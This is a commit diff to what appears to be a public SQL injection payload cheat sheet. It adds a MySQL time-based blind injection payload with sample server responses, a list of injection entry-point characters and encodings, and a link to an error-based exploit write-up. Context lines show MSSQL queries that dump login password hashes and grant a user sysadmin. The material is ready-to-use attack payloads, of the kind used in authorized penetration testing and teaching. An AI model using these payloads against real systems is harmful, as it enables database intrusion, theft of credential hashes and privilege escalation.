AD Attack - Golden Ticket + SQL/OpenRed/SSRF

2026-01-10 04:04:54 -08:00 · 2018-04-12 23:23:41 +02:00
parent 354d94219e
commit b8fbca3347
8 changed files with 92 additions and 9 deletions
--- a/injection/MSSQL
+++ b/injection/MSSQL
@@ -37,7 +37,7 @@ SELECT name, password FROM master..sysxlogins
 SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.)

 MSSQL 2005
-SELECT name, password_hash FROM master.sys.sql_logins 
+SELECT name, password_hash FROM master.sys.sql_logins
 SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```

@@ -78,3 +78,4 @@ EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
 ## Thanks to
 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
 * [Sqlinjectionwiki - MSSQL](http://www.sqlinjectionwiki.com/categories/1/mssql-sql-injection-cheat-sheet/)
+ * [Error Based - SQL Injection ](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
--- a/injection/MySQL
+++ b/injection/MySQL
@@ -48,6 +48,21 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12
 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
 ```

+## MYSQL Blind using a conditional statement
+TRUE: `if @@version starts with a 5`:
+```
+2100935' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
+Response:
+HTTP/1.1 500 Internal Server Error
+```
+
+False: `if @@version starts with a 4`:
+```
+2100935' OR IF(MID(@@version,1,1)='4',sleep(1),1)='2
+Response:
+HTTP/1.1 200 OK
+```
+
 ## MYSQL Blind with MAKE_SET
 ```
 AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
--- a/injection/README.md
+++ b/injection/README.md
@@ -4,27 +4,45 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t

 ## Entry point detection
 Detection of an SQL injection entry point
+Simple characters
 ```
 '
-"
 %27
-" / %22
-; / %3B
+"
+%22
+#
+%23
+;
+%3B
+)
+Wildcard (*)
+```
+
+Multiple encoding
+```
 %%2727
 %25%27
+```
+
+Merging characters
+```
 `+HERP
 '||'DERP
 '+'herp
-' ' DERP
+' 'DERP
+'%20'HERP
+'%2B'HERP
+```
+
+Weird characters
+```
 Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
 transformed into U+0022 QUOTATION MARK (")
 Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
 transformed into U+0027 APOSTROPHE (')
-Wildcard (*)
 ```


-
 ## SQL injection using SQLmap
 Basic arguments for SQLmap
 ```
@@ -329,6 +347,8 @@ mysql> mysql> select version();


 ## Thanks to - Other resources
+* Detect SQLi
+  - [Manual SQL Injection Discovery Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
 * MySQL:
  - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
  - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)